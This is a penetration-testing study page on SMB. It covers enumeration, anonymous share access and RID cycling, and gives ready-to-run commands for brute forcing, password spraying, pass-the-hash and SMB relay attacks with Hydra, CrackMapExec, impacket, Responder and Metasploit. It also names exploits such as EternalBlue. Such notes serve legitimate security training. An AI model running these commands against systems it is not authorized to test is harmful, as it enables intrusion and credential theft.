Noirchapeau's Gitbook
Noirchapeau
NoirchapeauEsau
Noirchapeau
NoirchapeauEsau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Protocol Overview
  • Basic Information
  • Protocol Versions
  • Initial Enumeration
  • Port Scanning
  • Banner Grabbing
  • Anonymous/Guest Access
  • Testing Anonymous Access
  • Brute Force Attacks
  • Using Hydra
  • Using CrackMapExec
  • Using Metasploit
  • Common NSE Scripts
  • Share Operations
  • Listing Shares
  • Accessing Shares
  • RPC Enumeration
  • Using rpcclient
  • RID Cycling
  • Advanced Techniques
  • Pass-the-Hash
  • SMB Relay Attacks
  • Configuration Files
  • Samba Configuration
  • Windows Configuration
  • Common Vulnerabilities
  • Post-Exploitation
  • Information Gathering
  • Privilege Escalation
  • Common Status Codes
  • Best Practices for Pentesting
  1. Footprinting - Enumeration and Information Gathering Notes

SMB Pentesting Notes

Protocol Overview

Basic Information

  • Port: TCP 139 (NetBIOS), TCP 445 (Direct TCP/IP)

  • Protocol Type: Application layer

  • Purpose: File sharing, printer sharing, and remote administration

  • Security: Authentication and ACL-based access control

Protocol Versions

  1. SMB 1.0/CIFS

    • Legacy version, highly vulnerable

    • Used in Windows NT/2000/XP

    • Should be disabled due to security risks

  2. SMB 2.0/2.1

    • Introduced with Windows Vista

    • Improved performance and reliability

    • Better security features

  3. SMB 3.0+

    • Introduced with Windows 8/Server 2012

    • Supports encryption and secure failover

    • Current standard for Windows networks

Initial Enumeration

Port Scanning

# Basic SMB scan
nmap -p139,445 -sV <target>

# Aggressive scan with scripts
nmap -p139,445 -sV -sC -A <target>

# Vulnerability scanning
nmap -p139,445 --script smb-vuln* <target>

Banner Grabbing

# Using SMBClient
smbclient -L //<target> -N

# Using Metasploit
msfconsole -q
use auxiliary/scanner/smb/smb_version

# Using rpcclient
rpcclient -U "" -N <target>

Anonymous/Guest Access

Testing Anonymous Access

# Using smbclient
smbclient -L //<target> -N
smbclient //<target>/share -N

# Using smbmap
smbmap -H <target> -u "guest" -p ""
smbmap -H <target> -u "null" -p ""

# Using CrackMapExec
crackmapexec smb <target> --shares -u "" -p ""

Brute Force Attacks

Using Hydra

# Basic authentication
hydra -l user -P passwords.txt smb://<target>

# Multiple users
hydra -L users.txt -P passwords.txt smb://<target>

Using CrackMapExec

# Password spraying
crackmapexec smb <target> -u users.txt -p password123

# Brute force
crackmapexec smb <target> -u user -p passwords.txt

Using Metasploit

use auxiliary/scanner/smb/smb_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

Common NSE Scripts

# Discovery scripts
nmap -p445 --script smb-protocols <target>
nmap -p445 --script smb-security-mode <target>
nmap -p445 --script smb-enum-shares <target>
nmap -p445 --script smb-enum-users <target>
nmap -p445 --script smb-enum-domains <target>

# Vulnerability scripts
nmap -p445 --script smb-vuln-ms17-010 <target>
nmap -p445 --script smb-vuln-ms08-067 <target>
nmap -p445 --script smb-double-pulsar-backdoor <target>

Share Operations

Listing Shares

# Using smbclient
smbclient -L //<target> -U user

# Using smbmap
smbmap -H <target> -u user -p password

# Using CrackMapExec
crackmapexec smb <target> -u user -p password --shares

Accessing Shares

# Interactive access
smbclient //<target>/share -U user

# Mount share locally
mount -t cifs //<target>/share /mnt/share -o username=user

# Download files
smbget -R smb://<target>/share -U user

RPC Enumeration

Using rpcclient

# Connect
rpcclient -U "" -N <target>

# Common commands
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> lookupnames admin
rpcclient $> enumprinters

RID Cycling

# Manual RID cycling
for i in $(seq 500 1100); do 
    rpcclient -N -U "" <target> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""
done

# Using impacket
lookupsid.py anonymous@<target>

Advanced Techniques

Pass-the-Hash

# Using CrackMapExec
crackmapexec smb <target> -u Administrator -H "<HASH>"

# Using pth-smbclient
pth-smbclient //<target>/share -U DOMAIN/user%hash

# Using impacket
psexec.py -hashes :<hash> user@<target>

SMB Relay Attacks

# Using Responder
responder -I eth0 -wrfv

# Using ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

Configuration Files

Samba Configuration

  • Main config: /etc/samba/smb.conf

  • Users database: /var/lib/samba/private/passdb.tdb

  • Share definitions: /etc/samba/shares.conf

Windows Configuration

  • Registry: HKLM\System\CurrentControlSet\Services\LanmanServer

  • Group Policy: Computer Configuration\Windows Settings\Security Settings\File System

Common Vulnerabilities

  1. Protocol Vulnerabilities

    • EternalBlue (MS17-010)

    • EternalRomance

    • SMBGhost (CVE-2020-0796)

  2. Configuration Issues

    • Null sessions allowed

    • Guest access enabled

    • Weak share permissions

    • Unencrypted traffic

  3. Authentication Issues

    • Weak passwords

    • Password reuse

    • Clear-text credentials

    • Kerberos misconfiguration

Post-Exploitation

Information Gathering

  • Enumerate domain users and groups

  • Map network shares

  • Identify sensitive files

  • Check for hidden shares

  • Extract system information

Privilege Escalation

  • Check for writeable shares

  • Search for sensitive files

  • Look for stored credentials

  • Test for SeBackupPrivilege

  • Exploit service misconfigurations

Common Status Codes

Code
Meaning

0x00000000

Success

0xC0000022

Access Denied

0xC000006D

Logon Failure

0xC0000203

User Session Deleted

0xC0000224

Password Change Required

Best Practices for Pentesting

  1. Initial Reconnaissance

    • Identify SMB version

    • Check for null sessions

    • Test anonymous access

    • Map available shares

  2. Deep Enumeration

    • Enumerate users and groups

    • Check share permissions

    • Look for sensitive data

    • Test write access

    • Identify vulnerabilities

  3. Documentation

    • Record share listings

    • Document user accounts

    • Note system information

    • Save vulnerability evidence

  4. Risk Assessment

    • Evaluate security posture

    • Assess potential impact

    • Consider attack vectors

    • Prioritize vulnerabilities

  5. Reporting

    • Detail findings

    • Provide remediation steps

    • Include evidence

    • Suggest security improvements

PreviousFTP Pentesting NotesNextSSH Pentesting Notes